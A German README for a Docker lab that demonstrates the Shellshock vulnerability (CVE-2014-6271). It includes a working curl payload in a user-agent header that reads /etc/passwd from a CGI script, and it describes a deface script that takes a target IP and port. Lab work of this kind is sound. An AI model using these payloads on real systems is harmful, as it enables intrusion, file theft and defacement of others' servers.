
Projekt zur Präsentation einer CVE (ShellShock) mit PDF, technischer und reproduzierbarer Demonstration.
Dieses Projekt ermöglicht die Reproduktion der Sicherheitslücke CVE-2014-6271, auch bekannt als Shellshock. Shellshock ist eine Sicherheitslücke in Bash, die die Ausführung von bösartigem Code über Umgebungsvariablen ermöglicht.
Ziel dieses Projekts ist es, die Auswirkungen dieser Sicherheitslücke in einer Docker-Umgebung zu demonstrieren.
Stellen Sie vor dem Start sicher, dass Docker auf Ihrem Rechner installiert ist. Sie können Docker hier herunterladen.
Erstellen Sie im Projektverzeichnis das Docker-Image mit folgendem Befehl:
docker build -t ['image name'] .
Ersetzen Sie ['image name'] durch den Namen, den Sie dem Docker-Image geben möchten.
Nachdem das Image erstellt wurde, starten Sie einen Container aus diesem Image mit folgendem Befehl:
docker run -it --rm -p 8080:80 ['image name']
Dadurch wird der Dienst auf Port 8080 Ihres lokalen Rechners verfügbar gemacht.
Öffnen Sie Ihren Browser und rufen Sie http://localhost:8080 auf. Sie können das Verhalten der Anwendung beobachten und die Sicherheitslücke testen.
Führen Sie in einem anderen Terminal folgenden Befehl aus, um die Sicherheitslücke auszunutzen und den Inhalt der Datei /etc/passwd zu lesen:
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \
http://localhost:8080/cgi-bin/vulnerable
Dieser Befehl sendet einen speziell konzipierten user-agent-Header aus, um Shellshock auszunutzen. Wenn die Sicherheitslücke korrekt reproduziert wird, wird der Inhalt von /etc/passwd in der Terminalausgabe angezeigt.
Dieses Skript ermöglicht es, eine Ziel-Webseite zu defacen. Die Sicherheitslücke beruht auf einer fehlerhaften Konfiguration von CGI-Skripten, die die Ausführung beliebiger Befehle auf dem Server erlaubt.
Voraussetzungen: Stellen Sie sicher, dass das Ziel anfällig für den ShellShock-Fehler ist. Stellen Sie sicher, dass Sie die erforderlichen Berechtigungen haben, um den Exploit an diesem Ziel zu testen.
./exp_deface.sh <ip> <port>
./exp_deface.sh localhost 8080
Wichtig: Diese Sicherheitslücke darf nur zu Test- und Demonstrationszwecken in einer kontrollierten Umgebung eingesetzt werden. Verwenden Sie dieses Projekt nicht in Produktionsumgebungen.